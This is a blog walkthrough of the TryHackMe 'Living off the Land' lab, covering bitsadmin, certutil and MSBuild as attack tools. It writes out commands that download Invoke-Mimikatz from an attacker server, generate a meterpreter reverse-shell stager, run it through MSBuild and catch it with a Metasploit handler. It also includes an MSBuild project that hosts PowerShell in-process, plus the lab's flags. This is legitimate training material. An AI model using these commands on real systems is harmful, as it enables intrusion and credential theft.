TL;DR Walkthrough of the TryHackMe Living off the Land room, part of the Red Team Pathway.
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
Living off the Land is one of the rooms in the THM Red Team Pathway that piqued my interest, so I figured I’d post my notes on it. I’m also a big fan of using built-in tools.
Warmup questions
Visit the LOLBAS project’s website and check out its functionalities. Then, using the search bar, find the ATT&CK ID: T1040. What is the binary’s name?
Pktmon.exe
Use the search bar to find more information about MSbuild.exe. What is the ATT&CK ID?
T1127.001
Use the search bar to find more information about Scriptrunner.exe. What is the function of the binary?
Execute
BITSAdmin
Run bitsadmin.exe to download a file of your choice onto the attached Windows VM. Once you have executed the command successfully, an encoded flag file will be created automatically on the Desktop. What is the file name?
#Host files on Kali
cd /home/kali/Downloads/exploits/PowerShell
python3 -m http.server 9000
#Download the file on the Windows victim VM
bitsadmin.exe /transfer /Download /priority Foreground http://10.6.36.88:9000/Invoke-Mimikatz.ps1 c:\Users\thm\Desktop\Invoke-Mimikatz.ps1
enc_thm_0YmFiOG_file.txt
What is the file content?
Set-Location C:\Users\thm\Desktop
certutil -decode .\enc_thm_0YmFiOG_file.txt .\payload.txt
Get-Content .\payload.txt
THM{ea4e2b9f362320d098635d4bab8a568e}
PowerShell reverse shell without PowerShell.exe
Replicate the steps of the No PowerShell technique to receive a reverse shell on port 4444. Once a connection is established, a flag will be created automatically on the desktop. What is the content of the flag file?
The commands below use port 4443 rather than the 4444 mentioned in the question; whichever port you choose, the msfvenom LPORT and the handler's lport must match.
#Generate a PowerShell reverse shell stager (psh-reflection format)
cd /home/kali/Downloads/exploits/PowerShell
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=10.6.36.88 LPORT=4443 -f psh-reflection > liv0ff.ps1
#Download PowerLessShell & convert the PS1 to csproj
git clone https://github.com/Mr-Un1k0d3r/PowerLessShell.git
find / -name "PowerLessShell.py" 2>/dev/null
cd /home/kali/Downloads/exploits/PowerShell/PowerLessShell
python2 /home/kali/Downloads/exploits/PowerShell/PowerLessShell/PowerLessShell.py -type powershell -source ../liv0ff.ps1 -output liv0ff.csproj
Run PowerLessShell.py from the directory it was cloned into, as above; run from anywhere else it will likely fail with an odd error (the screenshot of it is not reproduced here).
Open two new BASH tabs. In one:
cd /home/kali/Downloads/exploits/PowerShell/PowerLessShell
python3 -m http.server 9000
In the other tab:
msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_winhttps; set lhost 10.6.36.88; set lport 4443; exploit"
In the original tab:
xfreerdp /v:10.10.248.89 /u:thm /p:TryHackM3
#On the victim Windows VM
#Save it as liv0ff.csproj (with a zero), the same name MSBuild is given below
Invoke-WebRequest http://10.6.36.88:9000/liv0ff.csproj -OutFile C:\Users\thm\Desktop\liv0ff.csproj
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\liv0ff.csproj
Catch the reverse shell in Meterpreter and read the file.
THM{23005dc4369a0eef728aa39ff8cc3be2}
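To show what PowerLessShell is doing under the hood, here is a hand-written MSBuild project that hosts the PowerShell engine inside MSBuild.exe. This is an added example, not code from the room or from the PowerLessShell project: PowerLessShell generates a project of the same general shape with your script embedded; this stripped-down version just runs a constructed demo script that reports which process it is running in. The task name (RunPs), file name (demo.csproj) and the script text are my own choices.

```xml
<!-- demo.csproj: constructed example, not the PowerLessShell template -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- With no DefaultTargets set, MSBuild runs the first target, which invokes our inline task -->
  <Target Name="Run">
    <RunPs />
  </Target>
  <UsingTask TaskName="RunPs" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <!-- The PowerShell engine is just a .NET assembly; reference it directly -->
      <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs">
<![CDATA[
using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System.Management.Automation;

public class RunPs : Task, ITask
{
    public override bool Execute()
    {
        // Constructed demo script: report which process hosts the runspace.
        // A real payload (e.g. the msfvenom stager) would go here instead.
        string script =
            "$p = Get-Process -Id $PID; " +
            "\"host=$($p.ProcessName) pid=$PID ps=$($PSVersionTable.PSVersion)\"";

        // PowerShell.Create() spins up a runspace in-process: no powershell.exe is started
        using (PowerShell ps = PowerShell.Create())
        {
            ps.AddScript(script);
            foreach (PSObject o in ps.Invoke())
                Log.LogMessage(MessageImportance.High, "{0}", o.ToString());

            // Surface script errors as build errors instead of silently succeeding
            foreach (ErrorRecord e in ps.Streams.Error)
                Log.LogError("{0}", e.ToString());
            return !ps.HadErrors;
        }
    }
}
]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
```

Run it the same way as the room's project, C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\thm\Desktop\demo.csproj, and the logged line will report host=MSBuild, confirming the script ran without powershell.exe ever appearing in the process list. One caveat worth knowing: script block logging (event 4104) and AMSI live inside System.Management.Automation.dll, not in powershell.exe, so a hosted runspace like this is still subject to both; the technique avoids the process name, not the engine's own telemetry.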
Summary
We demonstrated a few living-off-the-land binaries here (bitsadmin for download, certutil for decoding, MSBuild for execution), including one way to run PowerShell without powershell.exe.
We say it all the time: "focus on the privilege, not the tool". The attacker will just find a different TTP if you spend all your time blocking specific tools. Don't let the attacker get privileges and it won't matter what tool they use.
Cybersecurity is ultimately all about Identity and Access Management.
References
How to find files in bash: https://www.cyberciti.biz/faq/search-for-files-in-bash/
Suppress errors while searching in bash: https://linuxhint.com/two-dev-null-command-purpose/
PowerLessShell on GitHub: https://github.com/Mr-Un1k0d3r/PowerLessShell